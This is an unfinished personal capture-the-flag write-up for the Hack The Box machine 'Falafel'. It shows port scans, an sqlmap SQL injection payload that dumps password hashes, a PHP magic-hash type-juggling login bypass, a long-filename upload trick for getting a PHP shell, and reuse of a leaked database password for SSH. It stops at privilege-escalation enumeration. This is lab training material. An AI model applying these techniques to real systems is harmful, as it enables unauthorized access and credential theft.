Machine - Falafel - Linux - Hard - abandoned
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-enum:
| /login.php: Possible admin folder
|_ /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)
Enumeration http
- is disalowwed the txt…
- let’s fuzz for txt xD
- IT@falafel.htb
From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***
A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.
Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.
~admin
using sqlmap we got the dump of the database
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-8697' OR 1118=1118-- bVwQ&password=admin
[10:32:40] [INFO] retrieved: 1
[10:32:41] [INFO] retrieved: 0e462096931906507119562988736854
[10:32:57] [INFO] retrieved: admin
[10:32:59] [INFO] retrieved: admin
[10:33:01] [INFO] retrieved: 2
[10:33:02] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
[10:33:18] [INFO] retrieved: normal
[10:33:20] [INFO] retrieved: chris
[10:33:23] [INFO] recognized possible
Login as admin
password of chris is juggling the hash of admin I could not crack…
but I think we should be able to login with the sqli
at the end there also type jugling, since the hash starts by 0e it means that if we find a password that the md5 starts also with 0e we should be able to login
admin 240610708
Upload image /// shell
python image.py "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCAAABB.php.png"
we got a shell :D
from www-data to …
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
let’s improve our shell with rlwrap
we try the password in ssh and voila we are moshe now :)
from moshe to root?
there is another user yossi
/$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 16.04.3 LTS
Release: 16.04
Codename: xenial
pspy
- nothing